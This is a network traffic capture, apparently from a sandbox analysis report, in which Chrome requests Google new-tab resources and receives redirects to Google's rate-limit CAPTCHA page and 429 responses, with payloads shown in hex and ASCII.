Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
                                                                    2024-05-02 02:59:51 UTC64INData Raw: 33 31 38 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 79 74 20 63 72 6f 73 73 77 6f 72 64 20 63 6c 75 65 73 22 2c 22 6c 6f 74 74 65 72 79 20 70 6f 77 65 72 62 61 6c 6c 20 6a 61 63 6b 70 6f 74 22
                                                                    Data Ascii: 318)]}'["",["nyt crossword clues","lottery powerball jackpot"
                                                                    2024-05-02 02:59:51 UTC735INData Raw: 2c 22 62 79 72 6f 6e 20 62 75 78 74 6f 6e 20 69 6e 6a 75 72 79 22 2c 22 66 69 73 68 69 6e 67 20 67 75 69 64 65 20 73 74 65 6c 6c 61 72 20 62 6c 61 64 65 22 2c 22 73 6c 69 70 6b 6e 6f 74 20 32 35 74 68 20 61 6e 6e 69 76 65 72 73 61 72 79 20 74 6f 75 72 20 64 61 74 65 73 22 2c 22 62 65 74 68 65 73 64 61 20 73 74 61 72 66 69 65 6c 64 20 75 70 64 61 74 65 22 2c 22 67 6f 6f 67 6c 65 20 6c 61 79 6f 66 66 73 20 6d 65 78 69 63 6f 22 2c 22 6b 65 6e 74 75 63 6b 79 20 62 61 73 6b 65 74 62 61 6c 6c 20 6b 6f 62 79 20 62 72 65 61 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 70 72 65 22 3a 30 2c 22 74 6c 77 22 3a 66
                                                                    Data Ascii: ,"byron buxton injury","fishing guide stellar blade","slipknot 25th anniversary tour dates","bethesda starfield update","google layoffs mexico","kentucky basketball koby brea"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"pre":0,"tlw":f
                                                                    2024-05-02 02:59:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0 (the zero-length terminating chunk of the chunked response)


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    2 | 192.168.2.22 | 49169 | 172.217.1.4 | 443 | 1776 | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2024-05-02 02:59:51 UTC | 353 | OUT | GET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-02 02:59:51 UTC | 1816 | IN | HTTP/1.1 302 Found
                                                                    Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKeDzLEGIjBSLRpDP2VScdj7Wpd5SrmnrYLtq8Jxv8Ovu6XTpT1_vcDso1uPHungiEeAb9P6jnYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                    x-hallmonitor-challenge: CgwIp4PMsQYQ2cbPhQISBL9gluE
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                    Permissions-Policy: unload=()
                                                                    Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                    Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                    Date: Thu, 02 May 2024 02:59:51 GMT
                                                                    Server: gws
                                                                    Content-Length: 427
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Set-Cookie: 1P_JAR=2024-05-02-02; expires=Sat, 01-Jun-2024 02:59:51 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                    Set-Cookie: NID=513=NzyG8Nyv5BXujfkwphRTYxYEUVrb6jfX_2yeMuOfr_qNQxqvDKRrqrtrWEHZHxhJMeNDaUmaaS78O00fbCizccjghnIwkZvzsdQQgN5U-zhjUS1gHO8WIzLKgkl7guG8eeDU6_nnrtuUBmXKAstwUTeNKKRjYiMJ5yVbTN5x7t8; expires=Fri, 01-Nov-2024 02:59:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:51 UTC | 427 | IN | Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 25 33 46 61 73 79 6e
                                                                    Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    3 | 192.168.2.22 | 49170 | 172.217.1.4 | 443 | 1776 | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2024-05-02 02:59:51 UTC | 446 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-02 02:59:51 UTC | 1843 | IN | HTTP/1.1 302 Found
                                                                    Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGKeDzLEGIjDeDtf43edoX_DQr4xePeWIRj_Zk_cdJHjRaIqGGnjHhWEURD3S2dwEoI7xgpMRkzoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                    x-hallmonitor-challenge: CgwIp4PMsQYQ_tWelQISBL9gluE
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                    Permissions-Policy: unload=()
                                                                    Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                    Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                    Date: Thu, 02 May 2024 02:59:51 GMT
                                                                    Server: gws
                                                                    Content-Length: 458
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Set-Cookie: 1P_JAR=2024-05-02-02; expires=Sat, 01-Jun-2024 02:59:51 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                    Set-Cookie: NID=513=LkB_Hqntk55N-FkwqFcQWCEnqMKKabQfBv3CxQkaVu55mLFJndbeF9V5VbzO9R-GXq9I1GDYTeTS1uxTIrLIlWxuTFfPAOau3qyc6NTtnoWDpxWH0gdAD-ycAotGgLayl5TMxnrYksi6Xoq5vii-hCUmjtaY1oMG5kTAFZhXqVE; expires=Fri, 01-Nov-2024 02:59:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:51 UTC | 458 | IN | Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68
                                                                    Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    4 | 192.168.2.22 | 49171 | 172.217.1.4 | 443 | 1776 | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2024-05-02 02:59:51 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-02 02:59:51 UTC | 1761 | IN | HTTP/1.1 302 Found
                                                                    Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGKeDzLEGIjAngwEuuQDIFwKdm-Bs70gGjylYp6jr6gUkagUnxegoQxARWccq1LwEgBECfcL1PAAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                    x-hallmonitor-challenge: CgwIp4PMsQYQmP-K1gISBL9gluE
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                    Permissions-Policy: unload=()
                                                                    Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                    Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                    Date: Thu, 02 May 2024 02:59:51 GMT
                                                                    Server: gws
                                                                    Content-Length: 417
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Set-Cookie: 1P_JAR=2024-05-02-02; expires=Sat, 01-Jun-2024 02:59:51 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                    Set-Cookie: NID=513=lpyXZCtY4-f7RTQqITZzyfksHw8iVb8BjmhLRGhw22-oS5CYqo5Qf1n0WYSogBsLbVqyXW3EfQ34ZtB3eifVWsUeY-l_NgGeNuOYNvNaSG-Xrcu-BmWdwT6QAXyGGDBWCBmdSK8blzs9R5owObV2uBTanI8aQO5FG6WgAkohuMA; expires=Fri, 01-Nov-2024 02:59:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:51 UTC | 417 | IN | Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26
                                                                    Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    5 | 192.168.2.22 | 49172 | 172.217.1.4 | 443 | 1776 | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2024-05-02 02:59:51 UTC | 742 | OUT | GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGKeDzLEGIjBSLRpDP2VScdj7Wpd5SrmnrYLtq8Jxv8Ovu6XTpT1_vcDso1uPHungiEeAb9P6jnYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: 1P_JAR=2024-05-02-02; NID=513=NzyG8Nyv5BXujfkwphRTYxYEUVrb6jfX_2yeMuOfr_qNQxqvDKRrqrtrWEHZHxhJMeNDaUmaaS78O00fbCizccjghnIwkZvzsdQQgN5U-zhjUS1gHO8WIzLKgkl7guG8eeDU6_nnrtuUBmXKAstwUTeNKKRjYiMJ5yVbTN5x7t8
                                                                    2024-05-02 02:59:52 UTC | 356 | IN | HTTP/1.1 429 Too Many Requests
                                                                    Date: Thu, 02 May 2024 02:59:52 GMT
                                                                    Pragma: no-cache
                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Content-Type: text/html
                                                                    Server: HTTP server (unknown)
                                                                    Content-Length: 3131
                                                                    X-XSS-Protection: 0
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:52 UTC | 899 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 3f 61 73 79 6e 63 3d 6e 74 70 3a 32 3c 2f 74 69 74 6c 65 3e
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/ddljson?async=ntp:2</title>
                                                                    2024-05-02 02:59:52 UTC | 1255 | IN | Data Raw: 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 50 6b 68 47 37 39 55 33 66 62 77 66 48 47 35 57 6e 55 69 42 32 58 68 37 33 32 64
                                                                    Data Ascii: tCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="PkhG79U3fbwfHG5WnUiB2Xh732d
                                                                    2024-05-02 02:59:52 UTC | 977 | IN | Data Raw: 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e
                                                                    Data Ascii: ears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the mean


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    6 | 192.168.2.22 | 49173 | 172.217.1.4 | 443 | 1776 | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2024-05-02 02:59:51 UTC | 848 | OUT | GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGKeDzLEGIjDeDtf43edoX_DQr4xePeWIRj_Zk_cdJHjRaIqGGnjHhWEURD3S2dwEoI7xgpMRkzoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: 1P_JAR=2024-05-02-02; NID=513=LkB_Hqntk55N-FkwqFcQWCEnqMKKabQfBv3CxQkaVu55mLFJndbeF9V5VbzO9R-GXq9I1GDYTeTS1uxTIrLIlWxuTFfPAOau3qyc6NTtnoWDpxWH0gdAD-ycAotGgLayl5TMxnrYksi6Xoq5vii-hCUmjtaY1oMG5kTAFZhXqVE
                                                                    2024-05-02 02:59:52 UTC | 356 | IN | HTTP/1.1 429 Too Many Requests
                                                                    Date: Thu, 02 May 2024 02:59:52 GMT
                                                                    Pragma: no-cache
                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Content-Type: text/html
                                                                    Server: HTTP server (unknown)
                                                                    Content-Length: 3185
                                                                    X-XSS-Protection: 0
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 02:59:52 UTC | 899 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
